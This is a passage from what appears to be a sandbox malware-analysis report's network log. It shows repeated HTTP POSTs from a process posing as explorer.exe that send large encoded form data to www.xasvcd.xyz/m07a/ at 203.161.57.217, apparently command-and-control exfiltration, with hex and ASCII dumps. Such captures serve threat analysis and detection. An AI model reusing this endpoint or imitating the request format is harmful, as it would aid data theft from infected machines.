                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                Data Raw: 72 30 3d 4e 44 66 44 4e 6c 4a 5a 33 57 68 74 45 73 31 55 63 4c 69 51 54 79 4c 46 77 76 75 4f 48 78 75 6b 47 55 4f 6b 45 45 36 4b 47 71 42 4a 33 76 38 59 39 55 72 65 36 6e 75 35 66 2d 33 67 34 77 49 5a 71 59 33 78 79 4c 4b 41 72 76 47 50 43 33 70 68 47 39 31 70 33 37 75 58 4c 4c 53 4c 4a 61 4b 79 42 77 56 52 6b 68 74 30 68 6a 31 63 52 62 4d 63 51 65 37 71 62 68 33 44 4b 36 4a 38 6f 4a 4b 65 4f 30 74 78 49 68 61 78 73 56 78 75 68 56 71 51 7e 48 77 64 75 6d 7a 4e 6f 44 30 73 6d 57 5a 43 61 62 48 79 28 53 6a 31 53 76 33 47 68 6a 78 6e 7e 33 58 47 66 58 74 7a 4c 69 71 4e 61 38 62 4f 72 76 45 67 36 41 31 78 47 73 73 4b 74 43 52 42 64 6a 6c 65 4d 6a 50 6e 66 4f 38 31 6f 74 61 70 6a 67 4d 59 4f 71 69 62 6b 4e 47 36 47 45 78 46 76 54 4e 63 58 50 33 55 59 30 74 4b 68 6d 72 42 28 6e 67 4e 79 77 42 58 48 74 44 39 6b 57 4c 64 70 61 59 58 6f 6b 31 34 72 5f 54 33 54 62 63 37 4d 64 4e 67 55 59 66 7a 6c 66 34 67 39 76 47 50 33 34 47 57 6b 71 42 5f 69 31 47 43 63 69 35 36 62 5a 71 37 38 54 43 74 6b 36 6f 65 66 51 4f 63 54 30 41 78 49 5f 4d 53 79 31 28 45 4e 73 53 39 4e 6f 6c 55 50 34 53 73 55 30 6d 4c 32 6b 28 68 70 72 62 4c 28 65 28 34 7a 6b 45 6c 41 45 6a 6b 32 71 44 4e 6a 75 39 42 75 2d 74 65 30 42 6b 50 6c 4b 5a 74 4d 6d 78 66 6c 39 76 48 52 54 32 68 77 52 53 63 46 6f 6a 32 76 54 48 37 65 68 78 34 58 71 57 43 59 6c 46 79 72 76 33 6d 33 58 73 39 54 70 73 51 71 50 71 56 76 55 5a 4a 4a 61 6a 47 30 53 77 58 58 55 4f 47 52 36 6f 4a 38 33 42 30 57 39 30 4c 76 73 6f 50 41 4a 6c 45 35 75 4c 4d 6c 75 55 57 71 4c 77 6c 58 77 5a 6a 45 6c 5a 57 39 6f 62 59 59 2d 72 70 63 31 53 2d 28 5f 55 39 4f 66 73 66 74 45 36 37 46 5a 7e 34 64 33 34 61 35 33 4d 51 55 39 4b 45 57 4f 67 7a 77 79 56 4b 77 4c 73 53 32 62 59 68 69 67 63 70 77 5a 4d 34 79 6e 36 59 49 54 78 38 73 42 70 4e 7e 41 78 53 77 76 33 64 51 67 62 6e 6d 76 4a 70 41 42 4d 30 58 7a 76 79 62 65 70 53 5a 47 7e 67 50 36 55 6d 54 4d 52 56 70 4b 49 30 46 69 54 52 51 50 33 33 51 48 74 75 67 42 36 44 42 62 31 30 6c 76 68 65 31 56 66 4d 47 64 56 4c 6a 45 52 2d 6b 75 71 69 55 43 4a 62 34 52 38 32 74 32 63 6a 28 45 39 59 4c 4b 6e 5a 32 41 43 34 66 39 51 38 67 78 52 47 52 37 77 62 31 35 39 5a 50 62 77 72 38 49 46 45 49 2d 6f 4d 63 78 67 58 32 38 79 33 5a 4a 68 50 69 53 50 30 66 64 63 69 47 5f 68 45 41 4a 6b 5a 37 4b 62 6c 42 50 68 48 53 4b 47 51 4e 46 6f 48 31 76 43 74 33 32 6b 64 32 38 28 38 43 68 64 72 74 6c 34 6a 49 74 6a 39 67 4c 51 30 66 69 72 55 4f 5a 4b 47 48 4e 4c 5f 6d 6f 30 31 76 67 4b 38 52 79 34 69 52 76 74 72 39 74 46 71 52 70 77 38 76 77 6f 53 35 70 4d 5a 62 63 45 67 37 68 56 79 44 6f 49 6c 34 53 38 46 6f 74 63 59 78 74 30 39 6b 76 37 2d 77 6c 76 68 30 4c 75 42 68 37 72 4b 35 49 73 53 6e 6e 28 4c 47 45 57 78 48 76 31 48 43 4a 4b 76 44 33 51 31 6d 72 59 64 36 64 31 4f 55 56 54 4b 71 6a 62 4b 56 4a 76 4e 48 31 64 39 50 2d 70 75 36 72 57 67 51 48 67 58 6c 43 64 57 56 39 70 49 67 32 45 6c 53 41 28 38 78 4e 74 30 37 33 4e 52 62 33 74 2d 6a 6e 32 74 6c 76 61 59 4a 36 6f 79 59 44 72 52 28 7a 55 5f 77 6b 70 47 55 55 41 4c 37 6a 28 78 62 7a 33 59 76 71 47 70 66 36 55 38 44 33 39 75 6b 65 6a 43 70 5a 55 34 61 52 69 65 35 35 48 74 33 69 50 63 36 53 46 58 68 78 32 48 39 34 44 6a 5a 54 76 39 76 44 47 65 53 57 4e 75 6d 66 5a 42 4b 32 6c 4a 68 5a 77 38 69 70 7e 42 41 63 43 2d 6a 69 30 63 59 67 77 6d 6b 77 74 62 70 37 59 38 6a 33 6f 4f 38 72 52 65 75 75 30 54 6b 36 64 42 5a 73 41 58 41 70 57 58 6d 53 34 37 46 4f 75 54 73 6a 4f 6a 76 76 63 6e 34 76 47 5a 4d 50 6a 64 43 51 7e 6f 74 65 77 70 78 44 79 4e 56 31 55 2d 74 75 39 52 36 39 67 74 62 78 59 78 63 58 39 72 37 30 72 4d 37 4e 6b 57 6d 77 54 62 76 6c 4b 4e 7a 34 41 45 36 4b 44 6f 4b 6c 47 74 70 6f 35 58 38 79 43 57 5a 55 79 53 71 50 6c 6a 4a 64 73 4d 47 7a 6b 63 76 78 49 43 4a 58 6e 4a 4e 5f 65 61 76 31 59 4b 49 76 66 53 51 4d 54 48 62 31 50 2d 44 79 69 63 4c 6e 5a 4a 70 48 66 43 4e 6f 74 73 48 64 50 58 43 54 73 78 64 73 28 58 67 32 4e 64 33 56 47 46 71 77 43 74 42 47 66 35 61 68 58 6d 43 4f 6c 59 55 6a 71 56 4c 69 77 5a 33 42 63 59 61 36 42 74 4a 71 43 41 41 31 4c 2d 6c 74 38 2d 67 4b 49 6f 6d 31 71 62 6f 6b 74 4f 71 61 61 76 65 69 4e 78 4a 53 48 56
                                                                                                                                                                                                                                                                Data Ascii: r0=NDfDNlJZ3WhtEs1UcLiQTyLFwvuOHxukGUOkEE6KGqBJ3v8Y9Ure6nu5f-3g4wIZqY3xyLKArvGPC3phG91p37uXLLSLJaKyBwVRkht0hj1cRbMcQe7qbh3DK6J8oJKeO0txIhaxsVxuhVqQ~HwdumzNoD0smWZCabHy(Sj1Sv3Ghjxn~3XGfXtzLiqNa8bOrvEg6A1xGssKtCRBdjleMjPnfO81otapjgMYOqibkNG6GExFvTNcXP3UY0tKhmrB(ngNywBXHtD9kWLdpaYXok14r_T3Tbc7MdNgUYfzlf4g9vGP34GWkqB_i1GCci56bZq78TCtk6oefQOcT0AxI_MSy1(ENsS9NolUP4SsU0mL2k(hprbL(e(4zkElAEjk2qDNju9Bu-te0BkPlKZtMmxfl9vHRT2hwRScFoj2vTH7ehx4XqWCYlFyrv3m3Xs9TpsQqPqVvUZJJajG0SwXXUOGR6oJ83B0W90LvsoPAJlE5uLMluUWqLwlXwZjElZW9obYY-rpc1S-(_U9OfsftE67FZ~4d34a53MQU9KEWOgzwyVKwLsS2bYhigcpwZM4yn6YITx8sBpN~AxSwv3dQgbnmvJpABM0XzvybepSZG~gP6UmTMRVpKI0FiTRQP33QHtugB6DBb10lvhe1VfMGdVLjER-kuqiUCJb4R82t2cj(E9YLKnZ2AC4f9Q8gxRGR7wb159ZPbwr8IFEI-oMcxgX28y3ZJhPiSP0fdciG_hEAJkZ7KblBPhHSKGQNFoH1vCt32kd28(8Chdrtl4jItj9gLQ0firUOZKGHNL_mo01vgK8Ry4iRvtr9tFqRpw8vwoS5pMZbcEg7hVyDoIl4S8FotcYxt09kv7-wlvh0LuBh7rK5IsSnn(LGEWxHv1HCJKvD3Q1mrYd6d1OUVTKqjbKVJvNH1d9P-pu6rWgQHgXlCdWV9pIg2ElSA(8xNt073NRb3t-jn2tlvaYJ6oyYDrR(zU_wkpGUUAL7j(xbz3YvqGpf6U8D39ukejCpZU4aRie55Ht3iPc6SFXhx2H94DjZTv9vDGeSWNumfZBK2lJhZw8ip~BAcC-ji0cYgwmkwtbp7Y8j3oO8rReuu0Tk6dBZsAXApWXmS47FOuTsjOjvvcn4vGZMPjdCQ~otewpxDyNV1U-tu9R69gtbxYxcX9r70rM7NkWmwTbvlKNz4AE6KDoKlGtpo5X8yCWZUySqPljJdsMGzkcvxICJXnJN_eav1YKIvfSQMTHb1P-DyicLnZJpHfCNotsHdPXCTsxds(Xg2Nd3VGFqwCtBGf5ahXmCOlYUjqVLiwZ3BcYa6BtJqCAA1L-lt8-gKIom1qboktOqaaveiNxJSHVyU(3z-Xnida1c6llXL~sK8~uEbwVav7bixrDWRZHkJJBWJtLbGjekUGGuDglC1~5I2BvEDCV43WlaCwEBE(0dVRPOaM9mJAiMRrCgL2Gcr8xKbUf9yipZy31E2pi1z1emZP3lQD3PAyuYc~AGwQr441mXWs6K9vbN40bf6owHtAngtUkJz2_d93CtBZhxVfLo-XoupHRSvwRmtahTKXnrMdTsKxYdzFrnn29OEhSdzgbm_2k61Z9723fu02KCsSvSzig12l_I1RbyD4KryaK6dLR6p6CahQEHG8fIITRHBjzojbl9sIngISpMPtWfZLkirlOqM~xuFKzGL5AuCsgQzWiYSnAweJ03srUOffPBWFx76whibzWKUFIAHDfI-bXuFuTXCyr3TQgm1BSdp0ZmOO1iVB7dReDJ3sH552urJZqjz~9nvu_EXjYAO9edfbgMFzasHIwAPYHF2kkYzF6jvOZjO2c9q3YW5sv8ZvFz4IRVacDAt9pwlyuv3XyZb4BgzE-~1YwWN1cEwGiJ9RDPcTRyr28Dq2D7I7ZwqFoIurIt5wo(MuoNeVPf2Ec5UPYdZFr5dqrduQak7M2RPAbKoMStg(HlXys7XzkMRK_tvTlycAV3VU73EggsKzfXt(3t6NZplv7XrC2Gdt6XKZIzaPItSKRSga25Di2Dr~RMVtJ6DneVcD-~TOYPF0UY31sTitcRyFScKz-U-Us0sU40Qn5AOMjkTHLIAXcM0mS46lOAXPjRGntRG8XEDlmdXhUtqsUl-(MS09SY-8mkV76tyKft3shMSi8fR5FkQFz3_RF0wy_Be(CgYWjGS2OcVKPna4j8GAU1PN97ODNgqM-OHVuljtKhKW2NkXgfz7Jxuym7NqeZzjPSaVe5DgYLQNGfHlT3NqCJqnn~5zEjhZ9EfDMEUkkTi1BlQ3-(dF7twnOdXlXwpLLjyo8SwC_A6N6xHxq8D20xnflFVCZRXzilBPXSlm-RH41BHv9OUrMBh4EN4BC6vX093Im0tNgcsQ7GYORbWfpOO0K07OiAMPC84pTqH9wMxYosynkKQStWr1QKZp5XS1FhNtwu4CZMy08SEyjBSzoHM~hlOCCASTsoVde14ivfLpBut(Xm7qehY7dmBKcqBwS(WGPVQ(_LIp2MCtY2N6neiYzYcxTrl0-UtyMsSM2jOiLWG~ogm~dYDfDHm9i1exheaPqNZ1ckK155wC70bOt3HQ1NzPlD_(7868Oc8hVEeHygThP5gqml-WwSBss0HNNyHNHCaDWFYnhg58hC7t5QXp0CnqugNlM1xnSZZzsmqBqZKILixBh1X3Uzy6no6IxUii2PDBQgtbNVFFGrM14xYHXUfxv7zC-uuGKJzyJ9M3mRNVGi3mc7va1~E~vDsU7LGBtIbzFOaG44-jt4Q0BXoVysUcb55xMgOj_LFQjUC9R3MPyKkTprfQgDuIs(zFMOwhAY9yBrkm6FF5fSOLM9GvARw(cRPI2voy5GuDNN7HRoaTfI6aIhVALG3cimnU8V0HjCs04WXOta33Px8ArzVCy4CJUI26L(Ewk(Wsgddm1RdrYX5yh2etGF949fD(PsQcFWA6rXSXWRgaSZattiLd23Fbovlp5tMextAnlVH5zUOc6vj3HwZAlQ1PX1DmryhLJ5TBVBPZynjRkR9qV82dLbns3QRrTQm~cj1eyhnxMUFqlCwxGM3dY131xomOUZYfdU9l8YfrUgQM2e-i94CJmGbH8I_HOEqUkvkBE(8cX8Wb_h7EUpVRfH-7sdejkEqWUdwOXIFAAIZFxgpbI0zSy1azAyZ8vT9~euONTlyfU7Pf3K6f0H9s98ZBr8eK1BlgHl_w17TeSRV4xaNeR7uYuDlWpDuunitkv94o92hmofW~qZ3UY4YLmjScWB09dtYYaJGmweGDd00uhBXdv(B~YptP1EwQsgPWqggRrIIytcHlswjCaHSKNXo9BDPQdGj4PPsuRyxgtqEZUDU517RmWk_l0kV2emFto4hfKgaA8U6Bc7NE7nLNW0yqY(sI78qIj6S4I8egV3a4aR8nJQN7JrPmaLZQ3DlMxIA8w~UYG4ZpF8IoCatPNgakH38zq2j(1XyaTo_4-AKlMvdm66qNP~RJWyzSL3ExjDbIE~5cSTDXN6z0Bfxe0b8pI5EmOR7FOdFJe32rWI-pp9bXAlmr6Q_SpWLPZaeCfoSTt01aCeaCOqSUSvzS51B7PLVIIXE6iCyZY0zaoXPdOdUpQM9zdniOWaRoCJQteWvwk8JdrVbpQVOistHiUAwXVqFzywdjL6VZWuK2XPJKtEz1r7-aorcgSdVS-HbK7OUBFC3fNfSkZEsJVwhQhRftgEn7d~zBRYrXpi91xAuu129zgHX8LjldjEjqPZ4lwnNOBAarI48s04rpLGDD4hq8wCjsBzhABqqg79WpYrs9PfqFoAHYtA-rF787yoIK_mh4eVOWCtgjvvky4EBoUu5jIhcZYRM5ktAkDXMSi6XLyooR6UbT2EfmMRZnAH4agGODUM0rkLffPlB0mzkk3qhXsUEFwKjW4nSBxXPU9W63J1VczibcAPp(8xex_xlxlT-N5~Ke0kyvWKjDFAvfZuFslOjz6dQcxVve6aSAQ1JMtcK7OKOqDUWb720d3SsWxYyxLtM8fgQaFWGsfqu~PxuH6jmhXLb8tC6XSbB34kMW0IoCOWFXUOv2SVY(gweXpfnewvnDuZom
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.400096893 CEST25780OUTData Raw: 32 4e 59 4d 28 71 33 73 6c 61 45 55 74 33 56 49 74 70 46 58 57 32 55 42 32 6e 7a 51 45 36 71 42 48 4e 37 37 77 33 6b 32 78 43 72 74 33 64 35 67 50 54 44 70 6f 5a 7a 48 6a 30 70 6a 36 6d 4b 2d 68 76 50 72 6b 73 76 55 70 65 45 4a 6f 64 4c 69 65 6e
                                                                                                                                                                                                                                                                Data Ascii: 2NYM(q3slaEUt3VItpFXW2UB2nzQE6qBHN77w3k2xCrt3d5gPTDpoZzHj0pj6mK-hvPrksvUpeEJodLienr1~x9aG0(MD_auolvowB(eBVuefFtZ3uc8eSPYwuY9S_rJpvj1oJMZZWIYGbmt9xDAlpwi6yOR4pmTOMKqiFeE2-QCtOcV5A8ozdd5tGyAwJs5qka3HIbiIbq6NpL8Z4ZJ2krENQBGGrrqnvQjt3ogLE4stvCwB6e
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.610882998 CEST10312OUTData Raw: 57 77 68 51 46 4b 4a 72 73 4d 37 73 42 66 51 73 6f 54 62 6d 61 6d 6e 38 6a 6d 50 78 77 6b 32 6c 56 44 6c 37 56 7a 73 63 28 37 7a 51 51 47 77 78 50 68 46 71 75 44 28 4b 66 54 44 5f 44 73 75 39 43 44 33 30 55 51 41 57 63 44 55 4d 71 73 54 66 71 65
                                                                                                                                                                                                                                                                Data Ascii: WwhQFKJrsM7sBfQsoTbmamn8jmPxwk2lVDl7Vzsc(7zQQGwxPhFquD(KfTD_Dsu9CD30UQAWcDUMqsTfqeB5MUGbLNUr~-YCFGyVK0MToPINmLzR(CkbWgJqsGIgx07GPsPr8fiEjGykopaJgI96cRsCBjAsRWuigDD3AWQweHAiaas7kbY4eRfVxb1FTIJaPFNkPDE2RsGb42RVCrPfAyI1By1uyjLjNp2QWpCc5kSds79hI93
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.611068964 CEST41248OUTData Raw: 48 6a 4d 75 76 53 38 45 49 62 75 57 76 49 66 49 6a 41 76 63 66 4d 79 50 44 4a 49 67 36 58 58 71 34 77 66 67 64 4a 58 75 34 32 71 50 62 50 6b 55 75 62 51 78 4b 6f 33 5f 65 4e 59 46 68 49 31 73 4e 4b 69 71 54 34 64 45 45 4d 4b 70 48 77 71 4d 42 72
                                                                                                                                                                                                                                                                Data Ascii: HjMuvS8EIbuWvIfIjAvcfMyPDJIg6XXq4wfgdJXu42qPbPkUubQxKo3_eNYFhI1sNKiqT4dEEMKpHwqMBrYAc5D4GZLgemibe27sfEt5HGhrqSu8~Q9opyXc768e83Dq4sOW22h2disN8kviRBZF3osw8oXemvPaXk4pSCSXUBsFe5fy~db1R95MgmKU84gBscB3VqNzamuiCbjZwDbC3PplAhpktOvv1_7dnO0Htq3n0BIr~Dc
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821667910 CEST36092OUTData Raw: 51 6e 47 6d 4c 58 77 54 62 45 72 54 66 74 62 55 75 46 33 70 66 30 39 5f 38 4a 76 59 4c 68 47 49 34 57 44 49 57 46 75 48 73 69 56 37 6c 65 67 49 4c 4b 34 38 6f 69 62 5a 62 6d 52 63 76 38 30 33 38 66 69 67 75 7a 57 37 65 32 28 4c 47 4b 37 6a 69 41
                                                                                                                                                                                                                                                                Data Ascii: QnGmLXwTbErTftbUuF3pf09_8JvYLhGI4WDIWFuHsiV7legILK48oibZbmRcv8038figuzW7e2(LGK7jiAZNez9DRfO5gDRFZC6Kv2YqcK7VKoHauBA8FSHb6TJB8jEnaYDP0kH3oOVQKieKlKpUsvraYykFADEL1XYH6QkNpxkJgb8yhloGgibnz6AP1IpkE969CILaEBcvwZrZcdW3Da7qLgfAUUM5VOR6irv3k0LQJ0pbhgx
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821861982 CEST30936OUTData Raw: 31 54 63 35 77 4d 65 5a 69 6e 6e 44 55 36 35 4a 77 34 7e 66 5a 6e 79 4f 43 78 79 36 38 4b 79 55 71 6b 4b 33 6c 46 41 4d 68 46 35 4f 32 56 56 54 77 57 56 63 4e 32 35 76 6f 48 56 6b 4d 62 32 73 32 4e 47 30 43 6a 28 50 4e 61 6a 56 75 41 6d 6d 72 34
                                                                                                                                                                                                                                                                Data Ascii: 1Tc5wMeZinnDU65Jw4~fZnyOCxy68KyUqkK3lFAMhF5O2VVTwWVcN25voHVkMb2s2NG0Cj(PNajVuAmmr419Gh1XiT3o8XNY02gpvwrWSzRMcREpRNSrmIcRVkiaAAMmu2xxtHy1wq3-NUUwW7t7qqwNv988JzPd2rsQBRr1MGY_a97pOTDhZCCx6TQkh6CMGyzLbcU0wfB6JNIe7oC-uWTBVrhVJSHIHILaqDiHvs90o1z6kRD
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821943998 CEST5156OUTData Raw: 4e 49 32 66 67 37 4f 4a 43 6c 72 36 76 6f 57 74 69 45 45 36 54 56 28 43 70 46 73 7a 44 30 73 4c 6d 6f 34 62 79 4b 30 36 7a 78 46 69 34 43 55 48 6f 58 75 55 61 4e 28 56 62 4d 54 57 42 4d 31 46 38 77 57 33 5a 67 4d 74 4e 61 42 37 51 66 54 4c 57 68
                                                                                                                                                                                                                                                                Data Ascii: NI2fg7OJClr6voWtiEE6TV(CpFszD0sLmo4byK06zxFi4CUHoXuUaN(VbMTWBM1F8wW3ZgMtNaB7QfTLWhKpj8z84dY_HzlKTuwajxj24qAzWrW8U4qNrXgXdzC_Pl~mYARnDuUkWJshOret2gr0j6uamkLsbkA2OkEotjsEZArEJsVd5IB9RqNEkRp8AzvC6wfZTEbjp5WABSTYeMjhM9hsz50-8Qwfiqu01lV2Q526bIJabG1
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.821986914 CEST10312OUTData Raw: 75 68 45 58 65 4e 72 4a 49 49 7e 68 70 68 36 30 39 67 47 5f 36 66 72 57 44 7a 6e 62 30 34 76 54 6e 79 79 4d 58 63 71 6b 57 54 46 43 31 51 59 42 4d 36 78 35 42 6b 6c 6c 39 4e 79 6f 50 4c 59 36 36 69 66 44 46 66 73 2d 42 42 67 75 44 49 6e 77 42 38
                                                                                                                                                                                                                                                                Data Ascii: uhEXeNrJII~hph609gG_6frWDznb04vTnyyMXcqkWTFC1QYBM6x5Bkll9NyoPLY66ifDFfs-BBguDInwB82xeTPH9RujUUPSsvhlyqE_TiSRbWRYD3h73p80okF9wkuhE5IXwRSAt-Y-quHlTnHaVdDCQzun9UekP0PEnIGcfQQ1jIqA1omYWTAxzvxdH4A791Hw4Ot-Mv7XFGcbgtDCGkWhsTFMcSuSLIX53KwH0e~vG7zEk-O
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:14.822021961 CEST3170OUTData Raw: 37 75 75 38 32 4f 72 6d 45 37 70 42 6b 48 4b 61 38 4d 4f 53 51 43 32 6b 6f 4f 62 76 61 48 45 43 6e 56 4d 4c 79 71 6f 5a 4e 71 44 33 69 72 70 79 37 51 4c 54 6e 6c 63 56 6b 55 39 4f 38 71 70 75 73 4b 7e 76 58 54 72 4c 4c 73 6d 72 54 59 4c 65 63 4d
                                                                                                                                                                                                                                                                Data Ascii: 7uu82OrmE7pBkHKa8MOSQC2koObvaHECnVMLyqoZNqD3irpy7QLTnlcVkU9O8qpusK~vXTrLLsmrTYLecMRZdaig3rlMgaAYpqCUECvz9IKmkhrTO0msJjgJSPMvxQ171QZARygqReFCrWDb08bOmLla7NQMgCSrJWfEK-koQmFIZTcIFn19PoVdO1xmakVDk2IGns7V~vjFEfin3hY6o2~gegt7fO6A8XApAPF6Omcbk0vpuHw
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:15.039026022 CEST572INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Date: Thu, 18 Apr 2024 19:12:14 GMT
                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                2192.168.2.449743203.161.57.217802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                Apr 18, 2024 21:12:52.314519882 CEST12890OUTPOST /m07a/ HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.xasvcd.xyz
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 175500
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                Origin: http://www.xasvcd.xyz
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Referer: http://www.xasvcd.xyz/m07a/
                                                                                                                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                Data Raw: 72 30 3d 78 33 49 63 4b 6d 66 6a 4d 55 63 32 64 48 78 74 63 46 62 41 30 75 75 74 48 4a 77 72 4c 42 58 50 70 64 4b 4b 52 61 6f 4a 58 78 58 4e 41 67 79 37 62 6e 46 5f 6c 68 67 34 50 6e 34 6c 55 6f 31 57 50 78 32 47 63 44 37 66 65 5f 74 48 6a 69 73 4d 34 47 77 66 72 42 44 53 44 4a 5a 4c 6b 65 67 37 32 44 63 31 65 71 6c 47 4a 70 6a 45 57 31 6e 50 5a 64 63 73 34 35 49 64 76 50 54 30 59 71 52 68 79 69 43 31 6f 56 32 2d 61 76 68 79 65 6d 30 5f 28 4e 76 68 41 50 52 39 6e 44 43 69 68 5a 28 6e 51 4a 4c 6a 6b 77 6b 78 6c 44 6d 34 46 71 74 6e 71 49 69 75 77 44 41 6c 6a 33 44 51 66 52 78 7a 63 32 55 44 63 6b 77 59 4a 31 43 51 61 78 75 36 56 4a 72 41 79 4c 70 4f 4a 5f 6a 45 69 4b 4a 4f 31 78 4d 54 71 53 4a 69 51 4a 52 69 49 68 65 44 70 45 56 32 32 74 75 76 6e 53 70 58 64 37 33 5a 53 74 69 31 47 38 53 50 41 35 71 71 51 6d 53 68 70 79 76 73 6e 54 43 38 59 76 69 77 4f 6c 79 37 43 79 4d 4e 35 52 6b 7a 62 70 6d 34 4b 77 33 69 67 4b 75 63 71 4d 53 48 58 47 48 34 56 68 6b 74 68 72 4d 61 44 76 4e 47 5a 57 74 4d 32 61 57 65 54 42 78 47 6c 61 66 68 36 56 64 6b 38 4d 77 64 56 35 76 51 62 69 44 31 69 63 4c 72 70 39 59 41 49 47 65 67 73 73 46 6d 7e 5f 6c 46 6f 6a 6a 38 35 38 6b 77 6e 54 4b 47 32 52 49 39 65 70 6b 42 61 33 53 43 77 55 71 46 38 75 5a 6a 74 59 77 70 7e 46 7a 4c 33 57 73 73 75 35 64 48 33 7a 4f 33 74 6e 68 52 46 30 67 7a 47 77 52 79 55 76 55 42 74 5f 74 30 6e 62 47 67 6f 54 6f 6d 28 6d 4b 58 30 49 52 43 58 2d 67 5a 39 54 34 65 4f 6e 69 4f 59 35 74 63 70 6e 54 4a 78 54 38 41 68 35 6b 44 54 73 68 67 7a 4d 62 4b 52 4a 52 2d 4f 53 6a 6e 4a 57 64 6b 33 52 32 46 58 70 52 67 4b 73 73 72 54 57 5a 45 50 63 4c 31 28 42 33 58 35 41 6d 4f 45 6e 65 77 41 59 45 33 66 4e 6e 57 33 79 4d 43 64 70 6e 72 57 67 39 61 59 76 66 34 4a 33 4b 35 59 34 32 6a 55 61 48 50 58 65 33 4f 59 54 62 36 65 50 37 50 53 77 49 61 69 45 39 69 34 59 65 65 4d 72 77 32 6d 5a 48 72 32 5a 36 58 49 4d 54 67 6e 2d 58 55 46 73 28 46 37 36 4d 55 53 4b 30 69 46 77 42 4c 36 66 47 49 34 51 46 5f 76 64 6f 53 49 54 50 74 72 79 32 36 45 78 35 61 30 30 6f 2d 78 53 4f 46 36 6f 5a 64 6e 77 6c 6b 28 53 65 4e 6a 70 6c 6d 4e 35 28 56 67 51 56 39 77 4a 4a 74 78 56 76 63 51 30 62 4a 69 32 6b 79 4c 63 71 39 65 77 51 5a 4e 72 32 36 72 77 4c 37 31 71 6e 54 56 48 7e 39 28 57 55 5f 4f 69 66 62 54 55 73 78 35 4b 76 42 7e 30 36 31 35 48 4d 68 61 65 67 36 35 50 49 38 7a 45 51 6e 39 5a 7e 63 77 63 41 72 4c 56 4b 5f 52 30 4c 36 54 72 34 4f 4d 59 6e 75 63 57 53 54 68 31 56 50 39 6e 72 32 5a 63 30 4e 41 4d 49 37 30 4f 68 55 50 66 59 4b 62 69 7e 5f 6f 6d 6c 78 70 57 4c 49 44 32 37 54 62 62 63 38 4d 4a 66 75 6b 38 42 74 6e 4e 73 33 38 4b 74 53 41 77 75 6e 64 54 36 71 76 5f 49 75 4a 52 50 69 4f 68 6e 47 73 57 56 6c 33 75 5a 62 6b 37 4b 6e 34 50 4e 74 46 4f 5a 66 43 59 39 30 4d 35 36 4d 31 37 32 75 4e 56 28 4e 4e 41 38 51 6a 30 33 73 75 36 78 6a 6a 54 33 7a 54 50 69 76 79 65 7e 4d 42 4c 4e 41 69 6d 75 50 4b 55 4c 4c 